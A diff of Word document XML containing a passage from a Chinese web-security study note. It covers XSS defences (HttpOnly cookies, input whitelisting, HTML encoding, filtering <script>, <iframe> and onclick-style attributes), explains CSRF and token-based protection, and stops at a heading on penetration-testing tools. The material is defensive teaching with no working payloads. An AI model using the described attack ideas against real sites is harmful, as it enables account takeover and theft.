+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>标记为</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>HttpOnly</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>这样的话</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Javascript </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>中的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>document.cookie</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>语句就不能获取到</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>ookie</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>了</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>（</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>HttpOnly</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>一旦被设置，在浏览器的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>document</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>对象中就看不到</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>ookie</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>了。而浏览器在浏览网页的时候不受任何影响，因为</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>Cookie</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>会被放在浏览器头中发送出去</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">2. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>只允许用户输入</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>我们期望的数据</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>。</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>例如：年龄的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>textbox</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>中，只允许用户输入数字。而数字之外的字符都过滤掉。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">3. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>对数据进行</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>Html Encode</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>处理</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">4. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>过滤或移除特殊的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>Html</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>标签，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>例如</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>: &lt;script&gt;, &lt;iframe&gt; , </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>&amp;lt; for &lt;, &amp;gt; for &gt;, &amp;quot for</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">5. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>过滤</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>JavaScript</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>事件的标签。例如</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>"onclick=", "onfocus"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>等等。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>ASP.NET</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>中有防范</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>的机制，对提交的表单会自动检查是否存在</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>，当用户试图输入</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>代码的时候，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ASP.NET</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>会抛出一个错误</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>参考资料：</w:t>
+      </w:r>
+      <w:hyperlink r:id="rId51" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a6"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          </w:rPr>
+          <w:t>web</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a6"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          </w:rPr>
+          <w:t>安全之</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a6"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          </w:rPr>
+          <w:t>XSS</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a6"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          </w:rPr>
+          <w:t>注入</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId52" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a6"/>
+            <w:rFonts w:hint="eastAsia"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          </w:rPr>
+          <w:t>使用</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a6"/>
+            <w:rFonts w:hint="eastAsia"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          </w:rPr>
+          <w:t>HttpOnly</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a6"/>
+            <w:rFonts w:hint="eastAsia"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          </w:rPr>
+          <w:t>提升</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a6"/>
+            <w:rFonts w:hint="eastAsia"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          </w:rPr>
+          <w:t>Cookie</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a6"/>
+            <w:rFonts w:hint="eastAsia"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          </w:rPr>
+          <w:t>安全性</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+          <w:tab w:val="left" w:pos="1440"/>
+        </w:tabs>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>CSRF</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>注入</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:ind w:firstLine="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>CSRF</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>（</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Cross-site request forgery</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>），中文名称：跨站请求伪造，也被称为：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>one click attack/session riding</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:ind w:firstLine="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>你这可以这么理解</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>CSRF</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>攻击：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>攻击者盗用了你的身份，以你的名义发送恶意请求</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>。</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>CSRF</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>能够做的事情包括：以你名义发送邮件，发消息，盗取你的账号，甚至于购买商品，虚拟货币转账</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>......</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>造成的问题包括：个人隐私泄露以及财产安全。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
+          <w:noProof/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="6645910" cy="3746500"/>
+            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
+            <wp:docPr id="29" name="图片 28" descr="2009040916453171.jpg"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="2009040916453171.jpg"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId53" cstate="print"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6645910" cy="3746500"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia" w:hint="eastAsia"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>CSRF</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>攻击是源于</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>WEB</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>的隐式身份验证机制！</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>WEB</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>的身份验证机制虽然可以保证一个请求是来自于某个用户的浏览器，但却无法保证该请求是用户批准发送的！</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="FF0000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>CSRF</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>的防御</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>服务端的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>CSRF</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>方式方法很多样，但总的思想都是一致的，就是在</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>客户端页面增加伪随机数</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>首先在后台设置一个</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Cookie</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>的随机数</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">2. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>在表单中添加一个控件，存放该随机数</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">3. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>在表单提交的后台验证该随机数</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="18"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+        </w:tabs>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>渗透注入检测工具</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
